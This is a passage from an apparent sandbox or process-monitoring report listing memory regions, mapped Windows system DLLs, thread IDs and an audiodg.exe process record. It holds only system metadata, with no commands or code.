"pagefile_0x0000000000010000" filename = "" Region: id = 37870 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 37871 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 37872 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 37873 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 37874 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 37875 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 37876 start_va = 0x280000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 37877 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 37878 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 37879 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 37880 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 37881 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 37882 start_va = 0x100000 end_va = 0x11cfff entry_point = 0x100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37883 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 37884 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 37885 start_va = 0x100000 end_va = 0x11cfff entry_point = 0x100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37886 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37887 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 37888 start_va = 0x100000 end_va = 0x17ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 37889 start_va = 0x3c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 37890 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 37891 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 37892 start_va = 0x360000 end_va = 0x360fff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 37893 start_va = 0x370000 end_va = 0x370fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 37894 start_va = 0x4d0000 end_va = 0x8c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 37895 start_va = 0x8d0000 end_va = 0x92bfff entry_point = 0x8d0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37896 start_va = 0x8d0000 end_va = 0x92bfff entry_point = 0x8d0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37897 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 37905 start_va = 0x910000 end_va = 0x94ffff entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 37906 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 37907 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 37917 start_va = 0x8d0000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 37918 start_va = 0xb20000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 37919 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37920 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 37927 start_va = 0xb80000 end_va = 0xbbffff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 37928 start_va = 0xbe0000 end_va = 0xeaefff entry_point = 0xbe0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 37929 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37930 start_va = 0x741f0000 end_va = 0x74201fff entry_point = 0x741f0000 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 37931 start_va = 0x74210000 end_va = 0x74216fff entry_point = 0x74210000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 38035 start_va = 0xeb0000 end_va = 0xeeffff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 38036 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 38039 start_va = 0xad0000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 38040 start_va = 0x74090000 end_va = 0x74122fff entry_point = 0x74090000 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 38041 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 38042 start_va = 0x752e0000 end_va = 0x752f5fff entry_point = 0x752e0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 38043 start_va = 0x77730000 end_va = 0x77774fff entry_point = 0x77730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 38044 start_va = 0x75b30000 end_va = 0x75b37fff entry_point = 0x75b30000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 38045 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 38046 start_va = 0x770f0000 end_va = 0x770f5fff entry_point = 0x770f0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 38047 start_va = 0x75b50000 end_va = 0x75b56fff entry_point = 0x75b50000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 38048 start_va = 0x74080000 end_va = 0x7408ffff entry_point = 0x74080000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 38049 start_va = 0x950000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 38050 start_va = 0x970000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 38051 start_va = 0xa10000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 38052 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 38053 start_va = 0xef0000 end_va = 0x109ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 38054 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 38055 start_va = 0x74050000 end_va = 0x7407afff entry_point = 0x74050000 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 38056 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 38057 start_va = 0x75300000 end_va = 0x75316fff entry_point = 0x75300000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 38058 start_va = 0x75c50000 end_va = 0x75c5afff entry_point = 0x75c50000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 38059 start_va = 0x771b0000 end_va = 0x77206fff entry_point = 0x771b0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 38060 start_va = 0x74030000 end_va = 0x74043fff entry_point = 0x74030000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 38093 start_va = 0x1000000 end_va = 0x103ffff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 38094 start_va = 0x1060000 end_va = 0x109ffff entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 38095 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 38096 start_va = 0x73f60000 end_va = 0x73f6bfff entry_point = 0x73f60000 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 38097 start_va = 0x380000 end_va = 0x380fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 38098 start_va = 0x760d0000 end_va = 0x76152fff entry_point = 0x760d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 38099 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 38100 start_va = 0x9b0000 end_va = 0x9ebfff entry_point = 0x9b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38101 start_va = 0x9b0000 end_va = 0x9ebfff entry_point = 0x9b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38102 start_va = 0x9b0000 end_va = 0x9ebfff entry_point = 0x9b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38103 start_va = 0x9b0000 end_va = 0x9ebfff entry_point = 0x9b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38104 start_va = 0x9b0000 end_va = 0x9ebfff entry_point = 0x9b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38105 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38106 start_va = 0xef0000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 38111 start_va = 0x75c10000 end_va = 0x75c38fff entry_point = 0x75c10000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 38112 start_va = 0x73f50000 end_va = 0x73f58fff entry_point = 0x73f50000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 38113 start_va = 0x73f40000 end_va = 0x73f49fff entry_point = 0x73f40000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 38114 start_va = 0x1150000 end_va = 0x118ffff entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 38115 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 38174 start_va = 0xa50000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 38175 start_va = 0x10b0000 end_va = 0x10effff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 38176 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 38177 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 38220 start_va = 0x1190000 end_va = 0x12adfff entry_point = 0x1190000 region_type = mapped_file name = "aero.msstyles" filename = "\\Windows\\Resources\\Themes\\Aero\\aero.msstyles" (normalized: "c:\\windows\\resources\\themes\\aero\\aero.msstyles") Region: id = 38221 start_va = 0x74a80000 end_va = 0x74abffff entry_point = 0x74a80000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 38222 start_va = 0xa90000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 38223 start_va = 0x1190000 end_va = 0x1b8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 38224 start_va = 0x1b90000 end_va = 0x258ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b90000" filename = "" Region: id = 38225 start_va = 0x2590000 end_va = 0x266efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 38228 start_va = 0x1190000 end_va = 0x126efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 38229 start_va = 0x1190000 end_va = 0x126efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 38431 start_va = 0x9d0000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 38432 start_va = 0x75060000 end_va = 0x75080fff entry_point = 0x75060000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 38433 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 38436 start_va = 0x72b40000 end_va = 0x72b4efff entry_point = 0x72b40000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 38437 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 38438 start_va = 0x77120000 end_va = 0x77154fff entry_point = 0x77120000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 38441 start_va = 0x3a0000 end_va = 0x3a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 38510 start_va = 0x1260000 end_va = 0x129ffff entry_point = 0x0 region_type = private name = "private_0x0000000001260000" filename = "" Region: id = 38511 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 38524 start_va = 0x11c0000 end_va = 0x11fffff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 38525 start_va = 0x74600000 end_va = 0x7460cfff entry_point = 0x74600000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 38526 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 38529 start_va = 0x73ee0000 end_va = 0x73f26fff entry_point = 0x73ee0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 38547 start_va = 0x75bb0000 end_va = 0x75c0efff entry_point = 0x75bb0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 38548 start_va = 0x950000 end_va = 0x95bfff entry_point = 0x950000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 38549 start_va = 0x960000 end_va = 0x963fff entry_point = 0x960000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 38609 start_va = 0x950000 end_va = 0x95bfff entry_point = 0x950000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 38610 start_va = 0x1320000 end_va = 0x135ffff entry_point = 0x0 region_type = private name = "private_0x0000000001320000" filename = "" Region: id = 38611 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 38612 start_va = 0x960000 end_va = 0x963fff entry_point = 0x960000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 38846 start_va = 0x74bc0000 end_va = 0x74bd1fff entry_point = 0x74bc0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 38855 start_va = 0x12e0000 end_va = 0x131ffff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 38856 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Thread: id = 1151 os_tid = 0x360 Thread: id = 1153 os_tid = 0x368 Thread: id = 1156 os_tid = 0x374 Thread: id = 1157 os_tid = 0x378 Thread: id = 1158 os_tid = 0x37c Thread: id = 1161 os_tid = 0x388 Thread: id = 1174 os_tid = 0x3c0 Thread: id = 1177 os_tid = 0x3cc Thread: id = 1180 os_tid = 0x3d8 Thread: id = 1185 os_tid = 0x3ec Thread: id = 1191 os_tid = 0x408 Thread: id = 1192 os_tid = 0x40c Thread: id = 1203 os_tid = 0x438 Thread: id = 1204 os_tid = 0x43c Thread: id = 1212 os_tid = 0x460 Thread: id = 1213 os_tid = 0x464 Thread: id = 1230 os_tid = 0x4b4 Process: id = "676" image_name = "audiodg.exe" filename = "c:\\windows\\system32\\audiodg.exe" page_root = "0x7f1d11e0" os_pid = "0x398" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "672" os_parent_pid = "0x2b0" cmd_line = "C:\\Windows\\system32\\AUDIODG.EXE 0x2e0" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xe], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ac58" [0xc000000f], "LOCAL" [0x7] Region: id = 37949 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 37950 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 37951 start_va = 0x6d0000 end_va = 0x6edfff entry_point = 0x6d0000 region_type = mapped_file name = "audiodg.exe" filename = "\\Windows\\System32\\audiodg.exe" (normalized: "c:\\windows\\system32\\audiodg.exe") Region: id = 37952 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 37953 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 37954 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 37955 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 37956 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 37957 start_va = 0x170000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 37958 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 37959 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 37960 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 37961 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 37962 start_va = 0x20000 end_va = 0x86fff entry_point = 0x20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 37963 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 37964 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 37965 start_va = 0x74770000 end_va = 0x747a8fff entry_point = 0x74770000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 37966 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 37967 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 37968 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 37969 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 37970 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 37971 start_va = 0x74ac0000 end_va = 0x74bb4fff entry_point = 0x74ac0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 37972 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 37973 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 37974 start_va = 0x90000 end_va = 0xbffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 37975 start_va = 0x90000 end_va = 0xacfff entry_point = 0x90000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37976 start_va = 0xb0000 end_va = 0xbffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 37977 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 37978 start_va = 0x90000 end_va = 0xacfff entry_point = 0x90000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37979 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37980 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 37981 start_va = 0x350000 end_va = 0x450fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 37982 start_va = 0x460000 